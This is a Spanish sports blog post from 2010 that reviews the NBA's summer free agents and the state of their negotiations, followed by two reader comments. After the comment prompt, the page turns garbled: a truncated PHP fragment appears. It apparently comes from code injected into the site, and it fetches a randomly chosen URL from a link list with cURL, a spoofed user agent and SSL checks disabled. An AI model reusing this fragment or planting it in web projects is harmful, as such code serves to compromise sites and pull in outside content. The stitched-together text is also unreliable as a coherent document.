Los codiciados agentes libres de este verano

29 de June de 2010 por txusma

El 1 de julio se abre el período de contrataciones de agentes libres, un período del que llevamos hablando casi 2 años y es que salen a la palestra nombres importantísimos capaces de cambiar el destino de la franquicia que se haga con sus servicios. Pero es que además de los archiconocidos LeBron James, Dwyane Wade, Chris Bosh, Joe Johnson, Amare Stoudamire, etc… también se encuentran en el mercado otros jugadores que pueden resultar muy útiles en sus nuevos equipos. Vamos a pegar un repaso a los principales agentes libres y vamos a intentar resumir cuál es ahora mismo la situación de las negociaciones de cada uno de ellos:

1. LeBron James: Sin duda el jugador más deseado, el sueño erótico de más de un GM desde hace mucho tiempo. Ahora mismo todos los frentes están abiertos y es muy complicado predecir en qué franquicia acabará jugando.

2. Dwyane Wade: El número 2 de la lista, casi al mismo nivel que “King” James. Wade ha declarado que los Heat tienen opciones de renovarle y firmar además a James y Bosh pero de todas maneras sabemos que se entrevistará en los próximos días con Knicks, Bulls y Mavericks. La opción que comenta Wade es bastante improbable porque implicaría traspasar a Beasley y además no poder ofrecer el máximo a ninguna de las 3 figuras. Habría que ver si alguna querría renunciar a su parte del pastel.

3. Chris Bosh: Hoy mismo el GM de los Raptors, Bryan Colangelo, confirma que es más que posible que la franquicia canadiense se quede sin la que ha sido su estrella estos últimos años aunque no sabe si será vía sign-and-trade. De todas maneras, no creo que Bosh tenga el caché de auténtico jugador franquicia sino que siempre aparece de pareja con otro de los grandes. Él mismo hace poco declaró que estaba esperando a ver qué hacía LeBron James para tomar su decisión. Parece ser el objetivo número 1 de los Rockets.

4. Amare Stoudamire: Con el alero de los Suns se inicia el segundo-tercer nivel de agentes libres. Todavía no ha confirmado que ejerza la Player Option pero está claro que está tanteando el mercado. New York y Miami son uno de los destinos que más suenan si es que LeBron no acaba en ninguna de las 2 franquicias. Si se produce un sign-and-trade se abre el abanico de posibilidades con Spurs, Magic, Blazers y Mavs en la pomada.

5. Joe Johnson: Si deja los Hawks, será la segunda vez que Johnson abandone una franquicia ganadora. En la anterior ocasión la excusa era que quería liderar un proyecto, la de ahora tan solo puede ser el dinero porque los Hawks no le ofrecerían el máximo. Aparece en muchas apuestas como pareja de Amare y suena que su destino favorito sería Chicago aunque los Mavs, súper activos, también están interesados vía sign-and-trade. Las opciones de Rockets, donde podría ser pareja de baile con Bosh, y los Clippers, que sí podrían ofrecerle el máximo, también están sobre la mesa.

6. Carlos Boozer: Nadie espera que Boozer permanezca en Utah así que podemos confirmar que definitivamente llegó el momento de Paul Millsap. Miami, New Jersey y Chicago vuelven a ser los destinos que más suenan pero no se descarta que Boozer acabe en un equipo más potente como Dallas.

7. Dirk Nowitzki: El alemán tiene la opción de salir al mercado pero sólo lo haría si antes ha podido convencer a LeBron James de fichar por los Mavs. Un equipo con Dirk y LeBron parece prácticamente imparable en ataque.

8. Rudy Gay: Lo normal es que continúe en Memphis pero con la cantidad de dinero disponible que hay en varias franquicias no os extrañe que alguna, habiendo perdido sus opciones principales, se lance de cabeza a por el ex-Huskie. Si se da el caso los Grizzlies tendrán que pensarse muy bien si igualan la oferta.

9. David Lee: Si los Suns pierden a Amare podrían ofrecerle un buen contrato al ex de New York. Entre nosotros, al lado de Steve Nash tampoco veo tanta diferencia y sería bastante más barato.

10. Paul Pierce: El alero de los Celtics tiene la opción de abandonar la franquicia pero parece muy improbable. Pierce siempre ha sido un Celtic y no creo que ahora decida dejar de serlo.

11. Luis Scola: El caché del argentino ha subido como la espuma cada año que ha disputado coronando con los 16 puntos y 8 rebotes que promedió la pasada campaña. Los rumores de las llegadas de Bosh, más la elección de Patrick Patterson, podrían empujarle a estudiar ofertas.

12. Yao Ming: Otro que tiene la opción de salir al mercado aunque en su caso las enormes dudas sobre su estado físico no le auguran nada bueno. Sano sería una gran adquisición para cualquier franquicia pero en esta situación lo más probable es que permanezca un año más con los Rockets y el año que viene ya se verá.

13. John Salmons: Los Bucks ya han fichado contando que Salmons no continuará a la franquicia y es que el ex de los Bulls (entre otros) tiene ganas de ser bien valorado este verano. Puede aprovecharse de la cantidad de dinero disponible pero seguramente no sacará a nadie de pobre.

Y aún hay más: Ray Allen, Tyrus Thomas, Brendan Haywood, Josh Childress, Al Harrington, Richard Jefferson, Ronnie Brewer, Raymond Felton, JJ Redick, Udonis Haslem…

Comenta

52 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Me temo que no es así, Sergio…
    no soy un especialista en la materia, pero los Lakers pueden gastar 2 kilos más como excepción para fichar y todo lo demás en contratos mínimos. Eso es todo. Cualquier otra posibilidad pasaría por un traspaso.
    La renovación de Fisher o Brown no juega en todo este asunto, claro… pero el fichaje de Miller deja de ser posible, al menos por las cifras que se manejaron en principio.

    Diría que se renovará a Fisher y Powell (no sé si a Brown) y se traerá otro hombre interior… y punto. Ya está bien, por otro lado.

      Citar

  2. Love Denise dice:
    #2

    Johnson renueva por Hawks por 6 años y 119 millones $,
    personalmente, tras esta renovación, olvido a Hawks como candidato al anillo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>